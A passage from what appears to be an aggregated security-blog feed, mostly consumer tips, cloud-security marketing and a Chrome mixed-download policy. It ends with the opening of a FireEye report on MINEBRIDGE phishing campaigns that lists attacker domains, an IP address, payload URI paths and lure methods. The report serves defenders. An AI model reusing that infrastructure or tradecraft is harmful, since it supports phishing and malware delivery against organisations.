
 

 

 

 

 

 

The post Safer Internet Day 2020 appeared first on McAfee Blogs.

WhatsApp Users: Secure Your Desktop With These Tips

With over 500 million daily active users, WhatsApp is one of the world’s most popular messaging platforms. In an effort to provide even more ways to connect beyond iOS and Android, WhatsApp introduced a desktop version of the app in 2016, which allowed users to stay in touch from their home or work computer. However, a researcher from The Hacker News recently disclosed multiple vulnerabilities in WhatsApp which, if exploited, could allow remote attackers to compromise the security of billions of users.

How safe is WhatsApp?

According to researcher Gal Weizman, the flaws were found in WhatsApp Web, the browser version of the messaging platform. Weizman revealed that WhatsApp Web was vulnerable to an open-redirect flaw, which allows remote hackers to redirect victims to suspicious, arbitrary websites. If a hacker sent an unsuspecting victim a message containing one of these arbitrary links, they could then trigger cross-site scripting attacks. These attacks are often found in web applications and can be used by hackers to bypass access controls by injecting malicious code into trusted websites.

WhatsApp Web hack

If the victim clicks on the link in the message, the hacker could remotely gain access to all the files from their Windows or Mac computer, which increases the risk for identity theft. What’s more, the open-redirect flaw could have also been used to manipulate previews of the domain WhatsApp displays when links are sent through their platform. This provides hackers with another avenue to trick users into falling for phishing attacks.

 

How to stay safe

How can users continue to use messaging platforms like WhatsApp without putting themselves at risk of an attack? Follow these security tips for greater peace of mind:

  • Update, update, update. If you’re a WhatsApp Web user, be sure to update to the latest version to install the security patch for this flaw.
  • Think before you click. Be skeptical of ads shared on social media sites and messages sent to you through platforms like Facebook, Twitter, and WhatsApp. If you receive a suspicious message from an unknown sender, it’s best to avoid interacting with the message.
  • Hover over links to see and verify the URL. If someone you don’t know sends you a link, hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the message altogether.

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post WhatsApp Users: Secure Your Desktop With These Tips appeared first on McAfee Blogs.

Cloud Security is like Renting a Car!

Cloud security has many aspects and it is easy to miss the scale of the issue by taking a simple view.  For example, people may trust a particular cloud service provider and think that all security responsibility belongs to them, some people just look at the technical aspects (is data encrypted) or certifications (do they conform to ISO 27xxx) or forget the human aspect – sadly, any of these viewpoints can mean insecure cloud use and data loss for the company.

To explain the breadth of securing cloud, we have created a new white paper “The Cloud Security 3600 Shared Responsibility Model” that splits cloud security requirements into nine areas and discusses how to ensure each different area is being addressed.

In other areas of life, we also have a shared responsibility, even if it is usually seamless and so we don’t think about it much, for example when renting a car.

Firstly, when the car is new the manufacturer has the responsibility that it is roadworthy; has good brakes and tires, the airbags work and it’s not going to fall apart at the first corner. During the lifetime, the rental company and the renter are hopefully not going to test the airbags, they just assume that they will work as originally installed.

Once the car gets older, the owner (the rental company) is responsible for checking the tires, the brakes, servicing the car and keeping it roadworthy, the renter simply assumes that this is the case. The renter needs to have the appropriate driving license for the vehicle, this is checked by the rental company before the car is handed over.

The car includes seat belts, installed by the manufacturer, but it is the driver’s responsibility to wear their own, and ensure that all the family members wear them too. For young children, it is the driver’s responsibility to ensure that they have appropriate child seats and for the older kids, the parent has to ensure that they do not take off their seat belt.

General insurance is shared between the rental company and the renter (who, perhaps isn’t the only driver). Ultimately, the driver is responsible for driving the car appropriately for the conditions, driving more slowly in rain and snow and not speeding around corners.

Renting a car safely is a responsibility where five groups of people all have their part to play: car manufacturer, rental company, renter, passengers and the driver.  If one area is ignored, there could be an accident with tragic consequences, and it is no good saying “but I checked the other areas” – all need to be considered together.

Cloud computing is similar – you are not safe just because the cloud service provider has invested a lot in security. You are not safe just because you have anti-malware systems installed.  The service provider, enterprise, IT security team and user all have a part to play and if any one of the areas are not addressed, then security is compromised.

Cloud computing needs to be considered across each row of the diagram. The cloud service provider is responsible for the lowest levels of security (power, connectivity, server infrastructure etc.), and provides some security functions, but the enterprise is responsible for turning these on (for example think of the number of data loss incidents caused by misconfigured S3 buckets), only the enterprise can truly decide which data is confidential, while it is users who typically decide to share and collaborate via the cloud with external parties.

The paper discusses all of this in detail and suggests ideas and technologies to address each roe – just like renting a car, you need to address every row to be secure.

 

 

The post Cloud Security is like Renting a Car! appeared first on McAfee Blogs.

CCPA Compliance Whirlwind Continues

Proposed Regulations modifications are released While the struggle of getting ready for the CCPA continues, the media has reported mixed results of organizations responding to Consumer Rights requests. Reportedly, some organizations are responding with too much information and some with too little. Some are just missing the mark. Today, the California Attorney General’s office released […]

The post CCPA Compliance Whirlwind Continues appeared first on Privacy Ref.

Security vs. innovation: IT’s trickiest balancing act

At first glance, the deployment of cybersecurity measures and the pursuit of innovation might seem mutually exclusive. Strategies to enhance security are aimed at reducing risk, whereas innovation efforts require being open to taking risks.

But enterprises are finding ways to launch innovative new digital business initiatives while taking steps to protect data and other IT assets. By doing so, they’re establishing pathways to new revenue, improved customer experience, and new market opportunities, even as they tighten security requirements, protect systems and data and keep compliant with regulations.

After all, this is the formula for success in today’s business environment: Push transformative initiatives that embrace innovative technologies such as the cloud, mobile tech, artificial intelligence, data analytics, and the internet of things (IoT) in a way that ensures the security of valuable systems and data.

To read this article in full, please click here

7 Conversations to Help Build Up Your Family’s Digital Literacy Skills

Digital Literacy

With the surge of misleading content online, helping your child learn to become an independent thinker is no small task.

While schools have been charged with developing students’ digital literacy skills, parents also have a role in consistently sparking deeper thinking when navigating digital environments.

The sharper a child’s digital literacy skills, the more quickly he or she can identify biased agendas and deceptive content and form thoughts, insights, and opinions independently of the digital crowd think.

Here are a few conversations to focus kids on building up digital literacy skills.

7 conversations to build digital literacy skills

  1. Grow visual literacy. The world expresses itself through media today, which makes visual literacy (the ability to interpret art and media content) another must-have skill for kids. According to recent reports, Snapchat has 10 billion video views a day, Facebook video 8 billion views a day, YouTube video 5 billion views. Instagram reports its users upload 25 million photos every day. This visual tsunami increases the chances your child will encounter deep fakes (AI-enhanced video), malicious memes (false information placed on photos) designed to manipulate public opinion. Discuss: Learn ways to spot deep fakes with your kids (stray hairs, no blinking, eye movement, etc.). Additional resource: Watch and discuss this video and read the post Can You Spot a Deepfake? from LifeHacker with your family.
  2. Search with care. Search engines scan the web and bring up relevant content. However, not all that content is credible. Understanding a search engine’s function is essential, especially when your child is researching a paper and evaluating other content. Search engines rank by keywords, not content accuracy. Ask: Is this content credible and supported by legitimate sources? Is it presented as humor or an opinion piece? Is the URL authentic and trustworthy? Additional Resource: Common Sense Media’s video Smart Online Search Tips.
  3. Protect, respect privacy. Kids, fueled by emotion and impulse, often move around online with little thought to personal privacy or the privacy of others. Discuss: Talk about the basics often: Where are the privacy gaps in our technology? Where are there privacy gaps in my behavior? How can we create strong passwords? Are my privacy settings current? Do I have personal details in public view, either on profile info or in my posts? The other side of privacy: Respect friends’ privacy by asking permission to post photos, keeping personal secrets, and never sharing personal details or circumstances of another person in the online space.
  4. Recognize and respect points of view. The web is a big place with an ocean filled with different points of view. Part of becoming digitally literate is learning how to listen to and respect the opinions of others. Exercising this skill is essential to building empathy, eliminating cyberbullying and online shaming, and becoming a positive voice in the online space. Additional resource: Discuss Dr. Michele Borba’s blog post, 9 Habits of Empathetic Children.
  5. Always attribute content. The internet is a big place that showcases a variety of exciting, valuable, original content. However, that content doesn’t display a visible price tag. Therefore, great content is often re-shared without giving credit to the author or creator. Discuss: Talk about the value of a person’s art, writing, photos, and research. Find examples of how to correctly cite sources and share them with your child. Follow up by checking your child’s social feeds to see that sources are being cited correctly. Coach them to add attribution when needed. Additional resource: Go through this free, 5-day course for families from CyberWise on Digital Citizenship.
  6. Always consider your digital footprint. A digital footprint is anywhere we’ve personally connected online. These small digital breadcrumbs — when added together and viewed as a whole — are what others see, and consequently, believe about us. The parts of our footprint include social profiles we create, comments we leave, tweets, photos, or any time others mention us online. Ask: Is this photo something that will add or subtract value from my digital footprint? Will this post, photo, or tweet affect my chances of getting into college or competing for a job? Will I be proud of this post five years from now? Additional Resource: Author Sue Scheff’s blog post Online Reputation Reboot for Teens.
  7. Stay current with new technology. It’s more so adults than kids that need to make a larger commitment to new technology. Part of digital literacy is keeping up with current technology and preparing for future technology. By making this learning investment, we can better understand the origin of new technologies such as AI and spinoff trends such as deep fakes. Educating ourselves on the nuances of tools such as vlogs, audio, video, AR, AI, 3D printing, and machine learning is essential to navigating the current and future landscape. Additional resources: Consider subscribing to magazines online to get you rolling: TechCrunch.comTheNextWeb.comDigitalTrends.com.

Like other areas that require time and consistency to develop, your child’s digital literacy skills will take time to mature. Author Tim Elmore say on his Growing Leaders blog, when it comes to raising kids to thrive in the digital era, a parent’s role is clear, “We must clearly convey values and virtues like resilience, discipline, integrity, problem-solving skills, good communication, commitment, and responsibility. That’s the critical role we can play.”

So, have fun with these conversations always recognizing that your influence matters. Look for real-life digital literacy examples to talk about, and don’t forget to celebrate the wins you see your kids achieving online.

The post 7 Conversations to Help Build Up Your Family’s Digital Literacy Skills appeared first on McAfee Blogs.

How To Do A Virus Scan

Whether you think you might have a virus on your computer or devices, or just want to keep them running smoothly, it’s easy to do a virus scan. How you perform the virus scan depends on the software you have, so we’ll go through a few options below. But first, let’s cover a few telltale signs that you might may have a virus.

Do You Need A Virus Scan?

Is your computer or device acting sluggish, or having a hard time booting up? Have you noticed missing files or a lack of storage space? Have you noticed emails or messages sent from your account that you did not write? Perhaps you’ve noticed changes to your browser homepage or settings? Or maybe, you’re seeing unexpected pop-up windows, or experiencing crashes and other program errors. These are all signs that you may have a virus, but don’t get too worried yet, because many of these issues can be resolved with a virus scan.

What Does A Virus Scan Do, Exactly?

Each antivirus program works a little differently, but in general the software will look for known malware that meets a specific set of characteristics. It may also look for variants of these known threats that have a similar code base. Some antivirus software even checks for known, suspicious behavior. If the software comes across a dangerous program or piece of code, it removes it. In some cases, a dangerous program can be replaced with a clean one from the manufacturer.

How Do You Run A Scan?

On a Windows Computer:

If you are using the latest version of Windows, Windows 10, go into “Settings” and look for the “Updates & Security” tab. From there you can locate a “Scan Now” button.

Of course, many people have invested in more robust antivirus software that has a high accuracy rate and causes less drain on their system resources, such as McAfee Total Protection. To learn how to run a virus scan using your particular antivirus software, search the software’s “help” menu, or look online for exact instructions.

If you are using McAfee software, go here.

On a Mac Computer:

Computers running Mac software don’t have a built-in antivirus program, so you will have to download security software to do a virus scan. There are some free antivirus applications available online, but we always recommend investing in trusted software that can protect you from a variety of threats. Downloading free software can be risky, since cybercriminals know that this is a good way to spread malware.

Whichever program you choose, follow their step-by-step instructions on how to perform a virus scan, either by searching under “help”, or looking it up on their website.

On Smartphones & Tablets:

Yes, you can get the virus on your phone or tablet, although they are less common than on computers. However, the wider category of mobile malware is on the rise and your device can get infected if you download a risky app, click on an attachment in a text message, visit a dangerous webpage, or connect to another device that has malware on it.

Fortunately, you can protect your devices with mobile security software. It doesn’t usually come installed, so you will have to download an application and follow the instructions.

Because the Android platform is an open operating system, there are a number of antivirus products available for Android devices, allowing you to do a virus scan.

Apple devices are little different, however, because they have a closed operating system that doesn’t allow third parties to see their code. Although Apple has taken other security precautions to reduce malware risks, such as only allowing the installation of apps from Apple’s official app store, these measures aren’t the same as an antivirus program.

For more robust protection on your Apple devices, you can install mobile security software to protect the private data you have stored on your phone or tablet, such as contacts, photos, and messages.

All-In-One Protection:

If safeguarding all your computers and devices sounds overwhelming, you can opt for a comprehensive security product that protects computers, smartphones and devices from a central control center, making virus prevention a snap.

Why are virus scans so important?

New online threats emerge every day, putting our personal information, money, and devices at risk. In the first quarter of last year alone McAfee detected 504 new threats per minute, as cybercriminals adopted new tactics. That’s why it is essential to stay ahead of these threats by using security software that is constantly monitoring and checking for new known threats, while safeguarding all of your sensitive information. Virus scans are an essential part of this process when it comes to identifying and removing dangerous code.

How Often Should You Do A Virus Scan?

Most antivirus products are regularly scanning your computer or device in the background, so you will only need to start a manual scan if you notice something suspicious, like crashes or excessive pop-ups. You can also program regular scans on your schedule.

Preventing Viruses

Of course, the best protection is to avoid getting infected in the first place. Here are a few smart tips to avoid viruses and other malware:

  • Learn how to surf safe so you can avoid risky websites, links, and messages. This will go a long way in keeping you virus-free.
  • Never click on spammy emails or text messages. These include unsolicited advertisements and messages from people or companies you don’t know.
  • Keep the software on your computers and devices up to date. This way you are protected from known threats, such as viruses and other types of malware.
  • Invest in comprehensive security software that can protect all of your devices.
  • Stay informed on the latest threats, so you know what to look out for. The more you know about the latest scams, the easier they will be just spot, and avoid.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post How To Do A Virus Scan appeared first on McAfee Blogs.

Keys to the Kingdom, Smart Cities Security Concerns

By Sean Wray, VP NA Government Programs, Certes Networks

Smart cities seem inevitable. According to IDC, Smart City initiatives attracted technology investments of more than £63 billion globally in 2018, and spending is estimated to grow to £122 billion in 2022. Similarly, in 2018, the number of major metropolitan cities relying on or developing a comprehensive smart city plan – as opposed to implementing a few innovative projects without an overall smart plan – dramatically increased.

In the US, for example cities like Philadelphia, Newark and Chicago all have goals to upgrade and to become leading ‘SMART’ cities, while UK innovation is being spearheaded by major conurbations such as Bristol, London and Manchester.


A significant investment is being made by cities in data connectivity providing a number of technologies such as Wi-Fi 6, smart grid, and IoT sensor devices, all promising to enhance overall visibility and security. However, as we extend the reach of technology and connectivity, there will increasingly be cyber-risks to take into account. As part of their transformation, smart cities serve as a technology hub and gateway to major institutions such as banks, hospitals, universities, law enforcement agencies, and utilities. This means the storage and transmission of customer data such as social security numbers, addresses, credit card information, and other sensitive data, is a potential goldmine for malicious actors. Not to mention an increasing number of projects monitoring roads, traffic, traffic light and metro services, all of which must be kept secure from threats at all times.

Security Challenges
When connectivity and innovation meet such large city infrastructures, they immediately become vulnerable to cyber threats from malicious actors waiting to bring all that hard work to a standstill. And, the routes in are manifold.


We are increasingly dealing with connected versions of devices that have existed for a long time, such as CCTV cameras, and as a consequence, digital security is not very often incorporated into their designs.

In addition, cybersecurity will have to extend far past personal, or internal corporate networks, to encompass far-ranging technological protection for vast city networks at a scale and a pace many are struggling to respond to.

Moreover, the sheer volume of data being collected and transmitted across a multi-user network, with numerous locations, can be extremely challenging to protect. London’s City Hall Datastore, for example, holds over 700 sets of big data that helps address urban challenges and improve public services, and the rise in cashless payment methods for transport.

It is the complexity that the above factors represent that often overwhelms a network security team’s ability to ensure sensitive data is protected with encryption, especially when network infrastructures can be constructed using different vendor technology, many of whom do not provide strong encryption. This also includes many municipalities who have older Legacy, third party or disaggregated networks.

It is therefore not a matter of if but when sensitive data may fall into the wrong hands. Network security teams have to ensure that any data breach must be detected immediately before the infection spreads from network system to network system, potentially shutting off critical services for thousands of companies, notwithstanding for those who reside in the City itself.

Providing the Keys
Choosing the right encryption solution is critical and can be key in mitigating damage caused by a data breach. Most cities find implementing these solutions disruptive and complex, especially for organisations that operate large and diverse networks. For example, manual configuration of encryption can lead to human error unknowingly exposing risk and managing multiple vendors can be burdensome and inefficient. Most importantly, network visibility is lost with many encryption solutions, which is a significant issue as it reduces the ability for security teams to detect and thwart malicious actors and cyber threats.


The vulnerabilities and threats associated with trying to protect large volumes of data moving across a vast multi-user network involves a security strategy that is simple, scalable and uncomplicated in order to avoid any disruption of critical infrastructure services provided to businesses or citizens, not to mention be compliant with governmental cybersecurity regulations and / or code of practices

Whereas traditional Layer 2 & 3 encryption methods are often disruptive and complex, a Layer 4 solution enables encryption of data in transit independent of network applications and without having to move, replace or disrupt the network infrastructure. This is a significant savings in resources, time and budget. 

In addition, network blind spots due to problems, outages, and cyber-criminals using encryption to conceal malware, increase network security risk and are potential regulatory compliance issues. According to a recent survey from Vanson Bourne[i], roughly two-thirds, or 67 percent, of organisations say that network blind spots are one of the biggest challenges they face when trying to protect their data.

With network monitoring one of the strongest defences against blind spots, Layer 4 encryption and encryption management tools offer network visibility by keeping a close and constant eye on network traffic. Network visibility tools allows existing applications and net performance tools to work after encryption is turned on without blinding the network.

Finally, adding in network observability allows smart cities to analyse and gain deeper understanding of network policy deployment and policy enforcement by scrutinising every application that tries to communicate across the network, all the while monitoring pathways for potential threats now that each policy is observable in real-time. 

Conclusion
For organisations and teams tasked with implementing smart technology in residential, commercial and public spaces, plans on how to do so will have to be part of the design and planning stage – including how we securely implement and maintain these smart spaces. It is integral that all connected aspects of smart cities have undergone extensive planning and designing, with a smart city architecture for service key management at the core. Defining standards and enforceable policies that can be analysed to help identify network vulnerabilities and thwart potential threats is critical.


Providing better technology is an ever-evolving, fast-paced race and caution should be given to those cities who move so fast that they risk building an infrastructure without equally giving precedence to the protection of data of those who work and live in their city.

Related, my IBM Developer article 'Combating IoT Cyber Threats

Protecting users from insecure downloads in Google Chrome

Update (04/06/2020): Chrome was originally scheduled to start user-visible warnings on mixed downloads in Chrome 82. These warnings, as well as subsequent blocking, will be delayed by at least two releases. Console warnings on mixed downloads will begin as scheduled in Chrome 81.

At this time, we expect to start user-visible warnings in Chrome 84. The Chrome Platform Status entry will be kept up-to-date as timing is finalized. Developers who are otherwise able to do so are encouraged to transition to secure downloads as soon as possible to avoid future disruption.


Today we’re announcing that Chrome will gradually ensure that secure (HTTPS) pages only download secure files. In a series of steps outlined below, we’ll start blocking "mixed content downloads" (non-HTTPS downloads started on secure pages). This move follows a plan we announced last year to start blocking all insecure subresources on secure pages.
Insecurely-downloaded files are a risk to users' security and privacy. For instance, insecurely-downloaded programs can be swapped out for malware by attackers, and eavesdroppers can read users' insecurely-downloaded bank statements. To address these risks, we plan to eventually remove support for insecure downloads in Chrome.
As a first step, we are focusing on insecure downloads started on secure pages. These cases are especially concerning because Chrome currently gives no indication to the user that their privacy and security are at risk.
Starting in Chrome 82 (to be released April 2020), Chrome will gradually start warning on, and later blocking, these mixed content downloads. File types that pose the most risk to users (e.g., executables) will be impacted first, with subsequent releases covering more file types. This gradual rollout is designed to mitigate the worst risks quickly, provide developers an opportunity to update sites, and minimize how many warnings Chrome users have to see.
We plan to roll out restrictions on mixed content downloads on desktop platforms (Windows, macOS, Chrome OS and Linux) first. Our plan for desktop platforms is as follows:

  • In Chrome 81 (released March 2020) and later:
    • Chrome will print a console message warning about all mixed content downloads.
  • In Chrome 82 (released April 2020):
    • Chrome will warn on mixed content downloads of executables (e.g. .exe).
  • In Chrome 83 (released June 2020):
    • Chrome will block mixed content executables
    • Chrome will warn on mixed content archives (.zip) and disk images (.iso).
  • In Chrome 84 (released August 2020):
    • Chrome will block mixed content executables, archives and disk images
    • Chrome will warn on all other mixed content downloads except image, audio, video and text formats.
  • In Chrome 85 (released September 2020):
    • Chrome will warn on mixed content downloads of images, audio, video, and text
    • Chrome will block all other mixed content downloads
  • In Chrome 86 (released October 2020) and beyond, Chrome will block all mixed content downloads.
Example of a potential warning
Chrome will delay the rollout for Android and iOS users by one release, starting warnings in Chrome 83. Mobile platforms have better native protection against malicious files, and this delay will give developers a head-start towards updating their sites before impacting mobile users.
Developers can prevent users from ever seeing a download warning by ensuring that downloads only use HTTPS. In the current version of Chrome Canary, or in Chrome 81 once released, developers can activate a warning on all mixed content downloads for testing by enabling the "Treat risky downloads over insecure connections as active mixed content" flag at chrome://flags/#treat-unsafe-downloads-as-active-content.
Enterprise and education customers can disable blocking on a per-site basis via the existing InsecureContentAllowedForUrls policy by adding a pattern matching the page requesting the download.
In the future, we expect to further restrict insecure downloads in Chrome. We encourage developers to fully migrate to HTTPS to avoid future restrictions and fully protect their users. Developers with questions are welcome to email us at security-dev@chromium.org.

Leading with Cloud Security, Empowering Enterprise Innovation

Call it ancient history—2012. When sanctioned apps ruled the day. Shadow IT lurked, well, in the shadows. And protecting the enterprise meant locking down the cloud. Then, true to the principles of Darwinian evolution, enterprises began to adapt to the new natural order.

Let the record show, 97% of enterprises in 2020 rely on the cloud for some combination of SaaS, IaaS, or PaaS solutions to power their enterprise. Which is why McAfee’s cloud-led strategy to serve the enterprise is centered on an organization’s ability to protect data and workloads, whether in use, in motion, or at rest. President and CEO of McAfee, Peter Leav, puts it this way, “We are in a new world. There is simply more. More networks, more endpoints, more users, more applications, more data, more cloud.”

SaaS solutions make the enterprise agile, whether via collaboration tools like Slack or Box, relationship management and marketing automation technologies like Salesforce, or technical management from companies like ServiceNow. Agility is the name of the game, and the enterprise that moves fastest wins the day. And with IaaS and PaaS enabled by the likes of AWS, Microsoft Azure, and Google Cloud Platform, the evolution of the enterprise only accelerates.

McAfee is proud to lead at the front of the cloud revolution. Our award-winning MVISION Cloud created the Cloud Access Security Broker (CASB) category nearly a decade ago. And we’ve only built on our successes in the cloud from there, including 14 seminal patents (3X more than our nearest competitor). The Analyst community agrees—It’s gratifying to be named a Leader in reports by three influential analyst firms.

We built on our leadership in 2019 when McAfee acquired NanoSec, an innovator in zero-trust application visibility and security for multi-cloud environments. NanoSec enables organizations to secure applications once and run them on any cloud infrastructure at scale. But there’s more. NanoSec also provides McAfee cloud users the latest in container security. When you add NanoSec’s capabilities to McAfee’s existing cloud security portfolio, you can see that we now bring consistent data security, threat protection, governance, and compliance to virtually every element and every environment of the cloud.

Further proof of our cloud-led momentum unfolded in 2019 as MVISION Cloud was certified as a natively-integrated cloud solution for consumers, businesses, and governments by global leaders in the IaaS and PaaS arena. Specifically, McAfee was recognized by AWS as a Well-Architected Partner for our CASB and IPS solutions, as well as a Security Competency Partner for CASB, all to offer the same security controls available in a private data center. What’s more, AWS called out McAfee as an ISV Accelerator Partner for CASB, and an Amazon RDS Partner for McAfee Database Security. Microsoft likewise recognized our CASB leadership with its integration of MVISION Cloud with MS Teams. Microsoft and McAfee also partner through Office 365 Collaboration Controls to ensure security and compliance, and our virtual Advanced Threat Defense is on the Azure Marketplace. In November, Google Cloud Platform (GCP) announced MVISION Cloud’s integration into GCP for visibility and control of cloud resources. And McAfee is trusted by the U.S. government as a FedRAMP Moderate Authorized and FedRAMP Ready for FedRAMP High partner via our MVISION Cloud, Extended Threat Protection, Cloud Value Maturity, and End User Remediation solutions. We also enjoy FedRAMP Moderate In-Process status for MVISION Endpoint on the FedRAMP Marketplace.

Still, as rewarding as it is to be recognized by partners like AWS, MS, GCP, and FedRAMP, our customers’ successes are the real story. WEG is a perfect example. The multi-national manufacturing company headquartered in Brazil currently deploys McAfee® Client Proxy, McAfee® MVISION Cloud for Office 365, McAfee® Web Gateway, and McAfee® Web Gateway Cloud Service. This unified approach to cloud helps address WEG’s three biggest cybersecurity concerns, namely secure internet access, secure cloud access, and secure intellectual property. Pierre Pereira Rodrigues, CISO for WEG, puts it this way, “Our business users have been pushing for greater cloud adoption. Rather than wearing the ‘No, you can’t’ cybersecurity hat, we strive to say, ‘Let’s figure out how you can.’” The result is proof that a business can be innovative and not sacrifice security.

Maka Guerrero, Senior IT Security Analyst at Pacific Dental Services says, “MVISION Cloud allows us to have more flexibility on the fly than any other CASB on the market. The approach that McAfee is taking to secure the cloud aligns really well with our other partners like AWS and what they are trying to achieve, and it makes sense for our business goals.” A provider of administrative support to dental offices across the U.S., PDS deploys MVISION Cloud for AWS, MVISION Cloud for Box, MVISION Cloud for Custom Apps, MVISION Cloud for Office 365, MVISION Cloud for Salesforce, and MVISION Cloud for Shadow IT.

It’s customers like these—frontline defenders of this new digital age—who are writing tomorrow’s history, today. McAfee is proud to stand at their side even as our adversary pushes the limits of an equally Darwinian transformation of the threatscape.

With the scale, speed, and agility of the cloud on our side, let the new world continue to evolve.

The post Leading with Cloud Security, Empowering Enterprise Innovation appeared first on McAfee Blogs.

McAfee’s Women in Security Offer New Grads Career Insights

Launching your career is an exciting milestone, one that can also be nerve-wracking though. Chances are questions like What should I look for in a company? or How do I become a leader? have crossed your mind.

While we can’t answer all your questions, our Women in Security (WISE) employee resource group offered to host a panel discussion to encourage the next generation of women in tech to pursue their passions. Students asked questions about what it’s like to work in the technology industry, the importance of mentorship, overcoming imposter syndrome, achieving success early in career, and about life here at McAfee.

Here’s how they responded:

How did you build success early in your career?

Amanda, Data Scientist: “I quickly found that learning never stops. While a degree helps you build the foundation, real knowledge comes from exposure and experience. Take every challenge and opportunity thrown your way. Early in your career is the best time to take risks and just say yes.”

Flavia, IT Manager: “In everything I do, I keep three principles at the forefront: communication, awareness, and accountability. If you have these skills, you will succeed at any role.”

JoAnne, Cloud Application Engineer: “When it’s early in your career, you can build success by trying new tasks outside of your normal job duties. Do your best and take advantage of each opportunity. And remember, have fun along the way.”

How do you handle imposter syndrome?

Bolade, Sales Engineer: “Everyone faces self-doubt. As a woman, and a woman of a diverse background, I’ve faced imposter syndrome. You must fight through it and recognize that it’s only the voice in your head. To help you silence the doubt, reach out to your network and your mentor. Mentorship is an important part in building your confidence.”

Crystal, Talent Enablement Leader: “First, recognize that any negative thoughts are just that—thoughts. Acknowledge them and then instead of letting them make you feel unqualified, use them to empower you. Take action to fill any areas of improvement. You will face adversity in your career, but take them as lessons learned, gain perspective, and then move forward.”

How do you chart a path to leadership?

Crystal, Talent Enablement Leader: “Take time to research the role you want to be in. What will it take to get there? Know it’s not always a linear path though. It’s okay to take steps backwards or sideways when they help you achieve your long-term plan. Humble yourself for the journey.”

Sonia, Sr. Product Marketing Manager: “Start with a vision board and work towards the small wins to help you reach your goals. Also, keep in mind research tells us men and women approach opportunities differently. As women, we wait until we feel 100 percent qualified for the job, while men apply believing they will learn on the job. My advice to all women seeking any role and leadership is to just go for it—you are capable. Recognizing you can and will learn on the job is an important part of your success.”

Why McAfee?

Bolade, Sales Engineer: “The people. Not long after I started at McAfee, I took on another important role—motherhood. My leadership was incredibly supportive and when I returned from leave, I was promoted within six months. You can’t get where you want to be without good people to help you get there. I’ve found the supportive team I have at McAfee is critical to my fulfilment both personally and professionally.”

Sonia, Sr. Product Marketing Manager: “Here, I feel like I have family. I love how everyone always exchanges hellos in the elevator. Something small like this makes a big difference in your day. Working with a great team in a great environment is one of the most important things that helps you succeed, and I’ve found that at McAfee.”

Interested in building your career at company that helps women thrive? Search our openings!

The post McAfee’s Women in Security Offer New Grads Career Insights appeared first on McAfee Blogs.

Enterprise security in 2020: How to keep attackers out

Securing the enterprise is no easy task. With a huge workforce to train, hundreds or even thousands of devices to manage and protect, and forever evolving security threats – the job never stands still.

CSOs and CISOs rely on their strong network of information to keep their organization as secure as possible. IDG TECH(Talk) led a Twitter discussion, plus a live-streamed video, with security experts and tech industry watchers to talk about the state of enterprise security in 2020 and how to keep attackers out.

To read this article in full, please click here

STOMP 2 DIS: Brilliance in the (Visual) Basics

Throughout January 2020, FireEye has continued to observe multiple targeted phishing campaigns designed to download and deploy a backdoor we track as MINEBRIDGE. The campaigns primarily targeted financial services organizations in the United States, though targeting is likely more widespread than those we’ve initially observed in our FireEye product telemetry. At least one campaign targeted South Korean organizations, including a marketing agency.

In these campaigns, the phishing documents appeared to be carefully crafted and leveraged some publicly-documented — but in our experience uncommon and misunderstood — TTPs, likely in an effort to decrease detection of the malicious documents’ macros. The actor also used a self-hosted email marketing solution across multiple campaigns. Notably, the payload delivered in these campaigns leveraged a packer previously affiliated with a commonly-tracked threat actor, an overlap that we will explore later.

This blog post will review the theme of these campaigns and their targets, the adversary’s unique tradecraft, the MINEBRIDGE C++ backdoor, some potential attribution overlaps, and importantly — the threat actor’s love of rap music.

Targeting and Lure Detail

While we first identified MINEBRIDGE samples in December, we observed our first phishing campaigns relating to this activity in early January 2020. Email addresses used to send phishing messages were associated with domains that appear to have been registered specifically for this purpose within a few weeks of the activity — and were thematically consistent with the content of the phishing messages.

Additionally, the actor(s) responsible are likely using a self-hosted email marketing solution called Acelle. Acelle adds extended email headers to messages sent via the platform in the format of X-Acelle-<variable>. The messages observed across campaigns using these TTPs have included a “Customer-Id” value matching “X-Acelle-Customer-Id: 5df38b8fd5b58”. While that field remained consistent across all observed campaigns, individual campaigns also shared overlapping “X-Acelle-Sending-Server_Id” and “X-Acelle-Campaign-Id” values. All of the messages also included a “List-Unsubscribe” header offering a link hosted at 45.153.184.84 suggesting that it is the server hosting the Acelle instance used across these campaigns. The sample table for one campaign below illustrates this data:

Timestamp

Sender

Subject

x-acelle-subscriber-id

x-acelle-sending-server-id

x-acelle-customer-id

x-acelle-campaign-id

1/7/20 16:15

info@rogervecpa.com

tax return file

25474792e6f8c

5e14a2664ffb4

5df38b8fd5b58

5e14a2664ffb4

1/7/20 15:59

info@rogervecpa.com

tax return file

22e183805a051

5e14a2664ffb4

5df38b8fd5b58

5e14a2664ffb4

1/7/20

info@rogervecpa.com

tax return file

657e1a485ed77

5e14a2664ffb4

5df38b8fd5b58

5e14a2664ffb4

1/7/20 16:05

info@rogervecpa.com

tax return file

ddbbffbcb5c6c

5e14a2664ffb4

5df38b8fd5b58

5e14a2664ffb4

The URLs requested by the malicious documents and serving the final MINEBRIDGE payloads delivered in each of these campaigns provide additional overlap across campaigns. In all observed cases, the domains used the same bullet-proof hosting service. The URI used to download the final payload was “/team/invest.php” or, in one case, “/team/rumba.php”. Perhaps the most fun overlap, however, was discovered when trying to identify additional artifacts of interest hosted at similar locations. In most cases a GET request to the parent directory of “/team/” on each of the identified domains served up the lyrics to rap group Onyx’s “Bang 2 Dis” masterpiece. We will refrain from sharing the specific verse hosted due to explicit content.

One of the more notable characteristics of this activity was the consistency in themes used for domain registration, lure content, similarities in malicious document macro content, and targeting. Since first seeing these emails, we’ve identified at least 3 distinct campaigns.

Campaign #1: January 7, 2020 – Tax Theme
  • Emails associated with this campaign used the CPA themed domain rogervecpa.com registered in late November and the subject line “Tax Return File” with IRS related text in the message body.
  • The attached payload was crafted to look like an H&R Block related tax form.
  • Observed targeting included the financial sector exclusively.

Campaign #2: January 8, 2020 – Marketing Theme
  • Emails associated with this campaign used the same CPA themed domain rogervecpa.com along with pt-cpaaccountant.com, also registered late November.
  • The subject line and message body offered a marketing partnership opportunity to the victim.
  • The attached payload used a generic theme enticing users to enable macro content.
  • Observed targeting focused on a South Korean marketing agency.

Campaign #3: January 28, 2020 – Recruiting Theme
